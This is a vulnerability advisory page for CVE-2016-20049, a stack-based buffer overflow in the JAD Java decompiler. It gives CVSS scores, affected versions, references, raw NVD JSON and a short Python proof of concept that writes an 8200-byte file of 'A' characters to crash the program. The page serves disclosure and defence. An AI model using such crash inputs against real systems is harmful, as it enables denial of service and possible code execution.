CVE-2016-20049

Description

JAD 1.5.8e-1kali1 and prior contains a stack-based buffer overflow vulnerability that allows attackers to execute arbitrary code by supplying oversized input that exceeds buffer boundaries. Attackers can craft malicious input strings exceeding 8150 bytes to overflow the stack, overwrite return addresses, and execute shellcode in the application context.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:varaneckas:jad_java_decompiler:1.5.8e-1kali1:*:*:*:*:*:*:* - VULNERABLE

JAD <= 1.5.8e-1kali1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import sys

# Generate payload to trigger buffer overflow in JAD
# Description: Create a file with a large string to overflow the stack buffer.
# Usage: python poc.py > malicious_file.class (or input file)

# The buffer overflows after approximately 8150 bytes
# We fill the buffer with 'A' to crash the application
crash_payload = b'A' * 8200

try:
    # Write the payload to a file which can be fed to JAD
    with open('crash_jad.dat', 'wb') as f:
        f.write(crash_payload)
    print("[+] PoC file 'crash_jad.dat' created successfully.")
    print("[+] Run JAD against this file to trigger the vulnerability.")
except Exception as e:
    print(f"[-] Error creating file: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2016-20049
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2016-20049
[3] CVE Details https://www.cvedetails.com/cve/CVE-2016-20049/
[4] VulDB https://vuldb.com/cve/CVE-2016-20049
[5] http://www.varaneckas.com/jad/
[6] https://www.exploit-db.com/exploits/42076
[7] https://www.vulncheck.com/advisories/jad-8e-1kali1-stack-based-buffer-overflow-remote-code-execution

Raw JSON Data

JSON

{"cve": {"id": "CVE-2016-20049", "sourceIdentifier": "[email protected]", "published": "2026-03-28T12:16:01.407", "lastModified": "2026-04-22T13:58:46.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "JAD 1.5.8e-1kali1 and prior contains a stack-based buffer overflow vulnerability that allows attackers to execute arbitrary code by supplying oversized input that exceeds buffer boundaries. Attackers can craft malicious input strings exceeding 8150 bytes to overflow the stack, overwrite return addresses, and execute shellcode in the application context."}, {"lang": "es", "value": "JAD 1.5.8e-1kali1 y versiones anteriores contiene una vulnerabilidad de desbordamiento de búfer basado en pila que permite a los atacantes ejecutar código arbitrario al proporcionar una entrada sobredimensionada que excede los límites del búfer. Los atacantes pueden crear cadenas de entrada maliciosas que excedan los 8150 bytes para desbordar la pila, sobrescribir direcciones de retorno y ejecutar shellcode en el contexto de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:varaneckas:jad_java_decompiler:1.5.8e-1kali1:*:*:*:*:*:*:*", "matchCriteriaId": "2E369DAD-6CD8-49AE-83F2-0CED1FEE51E1"}]}]}], "references": [{"url": "http://www.varaneckas.com/jad/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/42076", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/jad-8e-1kali1-stack-based-buffer-overflow-remote-code-execution", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}